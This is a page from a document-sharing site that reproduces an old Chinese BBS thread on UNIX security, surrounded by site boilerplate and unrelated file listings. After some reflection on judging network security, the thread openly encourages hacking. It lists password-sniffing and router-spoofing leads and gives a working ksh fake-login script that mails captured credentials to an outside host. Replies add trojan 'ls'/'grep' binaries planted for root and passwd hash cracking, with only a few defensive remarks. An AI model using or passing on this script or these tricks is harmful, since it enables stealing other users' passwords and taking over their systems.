




已阅读5页,还剩2页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
UNIX系统安全2Windows系统 电脑资料 当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”, 当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”。他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可能性”,听起来倒是蛮有哲理味儿的,可如何实际操作呢?计算机系统的安全程度可以用“橘皮书”的定义来评价,网络系统是不是也可以搞出个“橘皮书”什么的呢? 当你左一层右一层地对信息加密时,心里也许认为层数越多就越安全。但事实是不是真的这样呢?当你又加了一层密时,到底增加了多少的安全性呢? “喏,你看.”,你指着自己的设计对用户说“即使有人突破了第一道防线,我们还有第二道防线呢。即使第二道也被突破,我们仍然有第三道、第四.”。可怜的用户望着得意洋洋的你,心里不禁嘀咕:“干嘛搞这么复杂.真的非这样不可吗?我可是只是想保证两个星期的安全性啊。” 为了防止大灰狼进来,小猪们把门窗都横七竖八地钉了个死死的。可是大灰狼会不会从别处进来呢?比如说.壁炉的烟囱!聪明的小猪们在壁炉里烧起了一锅开水.。小猪们是聪明的,我们的系统管理员们呢? 计算机系统的安全性依靠一种“访问控制模型”来进行。有没有可能建立一个“网络安全模型”并对它进行形式化的证明,以便从理论上深入开展网络安全的研究?这样就可以摆脱目前的被动地“打补丁”的做法。 网络入侵和网络安全是一对矛盾,没有Hacker高手就不会有好的安全系统。这听起来有些悲哀,可惜是事实。为了提高我们的安全防范能力,我看是不是先培养一批Hacker出来(中国的Hacker太少了)。在此提供几条线索供Hacker们参考: 用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户的口令(当然包括超级用户的)。 sendmail 5.5.9版本以前有个debug命令, 是个强有力的远程调试工具,可惜也是一个大bug。 冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然OSPF协议中有关于身份认证的部分,但很少有人用到。 NFS、NIS都是不太安全的。 1988年的WORM网络病毒最厉害的地方并不是传说中的利用 sendmail的缺陷,而是对看来毫无破绽的finger的攻击! 很多系统管理员为了关机方便而设立了halt之类的特殊用户, 怎样利用这一点来攻击呢? 侵入了一个系统之后,如何“打扫战场”让管理员看不出来? 如何潜伏下来以致于管理员除了重新安装系统,别无清除的办法呢? . 这些东西都不是我凭空想象的,国外的Hacker们就是这么做的(他们还有很多更厉害的招数呢), 1- : 1).用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户: 的口令(当然包括超级用户的)。 : 3).冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然: OSPF协议中有关于身份认证的部分,但很少有人用到。 这两个是取得口令的最简洁之法, 呵呵. - 我也有一简洁之法: 把下面的shell 命令用 ksh 运行 clear stty ignbrk echo login:c read logname stty -echo echo password:c read passwd print nLogin incorrectn print $logname $passwd | mail cxterm.bbsjet.ncic.ac. stty 0 stty echo exit - 嗯,是一种方法,但必须你能访问对方的机器才能偷到口令。常用的方法 还有在自己能用的目录里放上叫 ls grep 之类的程序, 希望 root能不小心运行到她们, 一旦获得 root 权限, 呵呵, 下面的我就不用说了. 所以 root 的PATH里不应当有 . (当前目录). 更 _的方法就是根据passwd文件里面的密文算口令的明文, 我曾经编过 一个算passwd的程序, 能在 Pentium 100机器上用半个小时左右的时间算出长度=5 & 只包含字母和数字 的口令. 因此选口令的时候要注意. 用jack14既可,攻击得当的话6位不含大写字母的pass也能在一月内破掉。 这一方法要求必须取得对方含有密文的passwd文件(有shadow passwd的机器上需要取得/etc/shadow), 所以要注意机器上passwd的安全性 (不要试图取消用户对该文件的读权限, 所有的用户都需要能读该文件). - 解决的办法, 可以用firewall屏蔽网段。 也可以使用SSL(secure socket layber)替代原有的socket明文数据传输。 - : 若干机器上都是用户可以直接su halt, 然后就成为超级用户了, :-) : 有的机器你可以用rlogin hostname -l halt 对方的机器就被shutdown了,: 哈哈
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 【正版授权】 IEC 60335-2-97:2023 EXV-CMV EN Household and similar electrical appliances - Safety - Part 2-97: Particular requirements for drives for shutters,awnings,blinds and similar
- 【正版授权】 ISO/IEC 9594-5:2020/AMD1:2025 EN Information technology - Open systems interconnection - Part 5: The Directory: Protocol specifications - Amendment 1: Miscellaneous enhancem
- 物流运输成本控制表格
- 制造业表格:产品分类表
- 印度入学考试试题及答案
- 医院出纳考试试题及答案
- 医用设备考试试题及答案
- 六一儿童节礼服活动方案
- 六一围棋活动方案
- 六一异地活动方案
- 2025年江西报业传媒集团招聘题库带答案分析
- 公司退货流程管理制度
- 东南亚艺术概论智慧树知到答案章节测试2023年云南艺术学院
- (完整版)食品安全自查、从业人员健康管理、进货查验记录、食品安全事故处置保证食品安全规章制度
- 《霸王茶姬》认证考核试题附答案
- 集装箱冷板式液冷数据中心技术规范
- GB/T 7106-2019建筑外门窗气密、水密、抗风压性能检测方法
- GB/T 28046.4-2011道路车辆电气及电子设备的环境条件和试验第4部分:气候负荷
- (精心整理)考试作文格纸
- 仓库管理员培训教材课件
- (新版)供电可靠性理论考试题库大全-上(单选、多选题)
评论
0/150
提交评论